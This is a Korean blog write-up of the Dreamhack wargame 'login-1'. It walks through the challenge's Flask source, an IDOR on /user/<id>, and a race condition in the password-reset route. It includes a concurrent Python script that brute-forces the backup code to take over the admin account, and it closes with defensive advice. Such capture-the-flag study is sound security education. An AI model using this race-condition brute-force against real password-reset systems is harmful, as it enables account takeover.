본문 바로가기
드림핵

[드림핵] login-1 풀이

by jwcs 2024. 1. 13.
728x90

https://dreamhack.io/wargame/challenges/47

 

login-1

python으로 작성된 로그인 기능을 가진 서비스입니다. "admin" 권한을 가진 사용자로 로그인하여 플래그를 획득하세요. Reference Server-side Basic

dreamhack.io

 

race condition 문제이다.

 

/login

로그인 페이지가 있다.

 

/register

회원가입도 할 수 있다.

 

/forgot_password

비밀번호를 재설정할 수 있다.

backupCode가 있는데, 이것은 회원가입하면 주어진다.

 

id:1234 pw:1234 회원가입 후

이런 식으로 말이다.

 

로그인 후 메인 페이지

로그인 후 메인 페이지에서 우측 상단에 ID, Name, Level이란 것들이 나온다.

/user/17

level이 뭔지 확인하기 위해 코드를 살펴보자.

 

#!/usr/bin/python3
from flask import Flask, request, render_template, make_response, redirect, url_for, session, g
import sqlite3
import hashlib
import os
import time, random

app = Flask(__name__)
app.secret_key = os.urandom(32)

DATABASE = "database.db"

userLevel = {
    0 : 'guest',
    1 : 'admin'
}
MAXRESETCOUNT = 5

try:
    FLAG = open('./flag.txt', 'r').read()
except:
    FLAG = '[**FLAG**]'

def makeBackupcode():
    return random.randrange(100)

def get_db():
    db = getattr(g, '_database', None)
    if db is None:
        db = g._database = sqlite3.connect(DATABASE)
    db.row_factory = sqlite3.Row
    return db

@app.teardown_appcontext
def close_connection(exception):
    db = getattr(g, '_database', None)
    if db is not None:
        db.close()

@app.route('/')
def index():
    return render_template('index.html')

@app.route('/login', methods=['GET', 'POST'])
def login():
    if request.method == 'GET':
        return render_template('login.html')
    else:
        userid = request.form.get("userid")
        password = request.form.get("password")

        conn = get_db()
        cur = conn.cursor()
        user = cur.execute('SELECT * FROM user WHERE id = ? and pw = ?', (userid, hashlib.sha256(password.encode()).hexdigest() )).fetchone()
        
        if user:
            session['idx'] = user['idx']
            session['userid'] = user['id']
            session['name'] = user['name']
            session['level'] = userLevel[user['level']]
            return redirect(url_for('index'))

        return "<script>alert('Wrong id/pw');history.back(-1);</script>";

@app.route('/logout')
def logout():
    session.clear()
    return redirect(url_for('index'))

@app.route('/register', methods=['GET', 'POST'])
def register():
    if request.method == 'GET':
        return render_template('register.html')
    else:
        userid = request.form.get("userid")
        password = request.form.get("password")
        name = request.form.get("name")

        conn = get_db()
        cur = conn.cursor()
        user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
        if user:
            return "<script>alert('Already Exists userid.');history.back(-1);</script>";

        backupCode = makeBackupcode()
        sql = "INSERT INTO user(id, pw, name, level, backupCode) VALUES (?, ?, ?, ?, ?)"
        cur.execute(sql, (userid, hashlib.sha256(password.encode()).hexdigest(), name, 0, backupCode))
        conn.commit()
        return render_template("index.html", msg=f"<b>Register Success.</b><br/>Your BackupCode : {backupCode}")

@app.route('/forgot_password', methods=['GET', 'POST'])
def forgot_password():
    if request.method == 'GET':
        return render_template('forgot.html')
    else:
        userid = request.form.get("userid")
        newpassword = request.form.get("newpassword")
        backupCode = request.form.get("backupCode", type=int)

        conn = get_db()
        cur = conn.cursor()
        user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
        if user:
            # security for brute force Attack.
            time.sleep(1)

            if user['resetCount'] == MAXRESETCOUNT:
                return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
            
            if user['backupCode'] == backupCode:
                newbackupCode = makeBackupcode()
                updateSQL = "UPDATE user set pw = ?, backupCode = ?, resetCount = 0 where idx = ?"
                cur.execute(updateSQL, (hashlib.sha256(newpassword.encode()).hexdigest(), newbackupCode, str(user['idx'])))
                msg = f"<b>Password Change Success.</b><br/>New BackupCode : {newbackupCode}"

            else:
                updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
                cur.execute(updateSQL, (str(user['idx'])))
                msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"
            
            conn.commit()
            return render_template("index.html", msg=msg)

        return "<script>alert('User Not Found.');history.back(-1);</script>";


@app.route('/user/<int:useridx>')
def users(useridx):
    conn = get_db()
    cur = conn.cursor()
    user = cur.execute('SELECT * FROM user WHERE idx = ?;', [str(useridx)]).fetchone()
    
    if user:
        return render_template('user.html', user=user)

    return "<script>alert('User Not Found.');history.back(-1);</script>";

@app.route('/admin')
def admin():
    if session and (session['level'] == userLevel[1]):
        return FLAG

    return "Only Admin !"

app.run(host='0.0.0.0', port=8000)

 

전체 코드이다. level이 1이면 admin 레벨로 flag를 얻을 수 있다.

 

        sql = "INSERT INTO user(id, pw, name, level, backupCode) VALUES (?, ?, ?, ?, ?)"
        cur.execute(sql, (userid, hashlib.sha256(password.encode()).hexdigest(), name, 0, backupCode))

회원가입 시에 기본적으로 레벨이 0이다. 따라서 레벨 1짜리 계정을 어떻게 하면 구할 수 있을지 고민해봐야 한다.

 

/user/17

아까 봤던 페이지다. 엔드포인트를 잘 살펴보면 /user/17이라는 것을 확인할 수 있다. 새로 생성한 계정이 17번째이고, 이전에 16개의 계정들이 있었다는 것을 추측해볼 수 있다.

 

/user/1

level이 1인 계정의 ID와 Name을 알 수 있다. 비밀번호 변경 페이지에서 이 계정의 비밀번호를 변경하면 level이 1인 계정을 얻을 수 있을 것이다.

 

/forgot_password

backupCode를 모르니 아무 숫자나 넣어서 보내봤다.

 

실패

left Count: 4라는 결과를 얻었다.

 

비밀번호 변경을 하는데에 몇가지 알아야 할 것이 있다.

 

def makeBackupcode():
    return random.randrange(100)

백업 코드는 0부터 99까지의 숫자로 구성되어 있다.

 

if user:
            # security for brute force Attack.
            time.sleep(1)

            if user['resetCount'] == MAXRESETCOUNT:
                return "<script>alert('reset Count Exceed.');history.back(-1);</script>"
            
            if user['backupCode'] == backupCode:
                newbackupCode = makeBackupcode()
                updateSQL = "UPDATE user set pw = ?, backupCode = ?, resetCount = 0 where idx = ?"
                cur.execute(updateSQL, (hashlib.sha256(newpassword.encode()).hexdigest(), newbackupCode, str(user['idx'])))
                msg = f"<b>Password Change Success.</b><br/>New BackupCode : {newbackupCode}"

            else:
                updateSQL = "UPDATE user set resetCount = resetCount+1 where idx = ?"
                cur.execute(updateSQL, (str(user['idx'])))
                msg = f"Wrong BackupCode !<br/><b>Left Count : </b> {(MAXRESETCOUNT-1)-user['resetCount']}"
            
            conn.commit()
            return render_template("index.html", msg=msg)

time.sleep(1) 부분을 통해 race condition 취약점이 발생한다. resetCount가 음수가 되면 MAXRESETCOUNT와 비교가 `==` 이기 때문에 우회가 가능한데, race condition을 이용하면 쉽게 익스플로잇이 가능하다. time.sleep(1)의 시간동안 많은 요청을 보내면 된다.

 

time.sleep(1)으로 취약점이 발생하는 이유는 다음과 같다.

        user = cur.execute('SELECT * FROM user WHERE id = ?', (userid,)).fetchone()
        if user:
            # security for brute force Attack.
            time.sleep(1)

DB에서 user의 정보를 검색하고 time.sleep(1)에 걸린다. 이 시간 이후에 user의 정보가 업데이트된다.

만약 이 시간 안에 6개의 요청이 user의 정보를 조회했다면 

            if user['resetCount'] == MAXRESETCOUNT:
                return "<script>alert('reset Count Exceed.');history.back(-1);</script>"

user['resetCount']가 모두 5이기 때문에 MAXRESETCOUNT에 걸리지 않게 되고, user의 resetCount는 -1이 되게 된다.

 

이론상으로는 time.sleep(1)이 없더라도 race condition 취약점이 발생할 수 있지만, time.sleep(1)이 저 위치에 있어주었기에 쉽게 익스플로잇이 가능했다.

 

import requests
import concurrent.futures

url = "http://host3.dreamhack.games:22998/forgot_password"

def send_request(seq):
    r = requests.post(url, data={'userid': 'Dog', 'newpassword': '1234', 'backupCode': seq})
    return seq, r.status_code

with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
    futures = [executor.submit(send_request, seq) for seq in range(100)]

    for future in concurrent.futures.as_completed(futures):
        seq, status = future.result()
        print(f"Sequence: {seq}, Status Code: {status}")

이러한 코드로 익스플로잇이 가능하다.

 

/forgot_password

틀린횟수가 음수이기때문에 5번의 기회를 모두 소진했음에도 비밀번호 변경 시도가 가능한 모습이다.

 

이제 로그인 후 `/admin` 페이지에 들어가주면 된다.

 

/admin

짜잔

 

방어 방법

 

IDOR 취약점으로 레벨이 높은 계정을 검색할 수 있었다. 인가된 사용자인지 검증하는 과정을 통해 접근을 제어해야한다.

 

파이썬 코드에서 race condition 취약점이 발생하고 있다. sleep(1)과 `==` 로직을 통해 이 문제를 더욱 두드러지게 만들어 줬다. 데이터베이스에서 로직을 구현한다면 트랜잭션을 사용하면서 이러한 문제를 해결할 수 있을 것이다.

728x90
반응형

'드림핵' 카테고리의 다른 글

[드림핵] file-csp-1 풀이  (2) 2024.02.05
[드림핵] Dream Gallery 풀이  (0) 2024.01.22
[드림핵] baby-sqlite 풀이  (2) 2024.01.10
[드림핵] out of money 풀이  (0) 2024.01.10
[드림핵][wargame.kr] type confusion 풀이  (2) 2024.01.10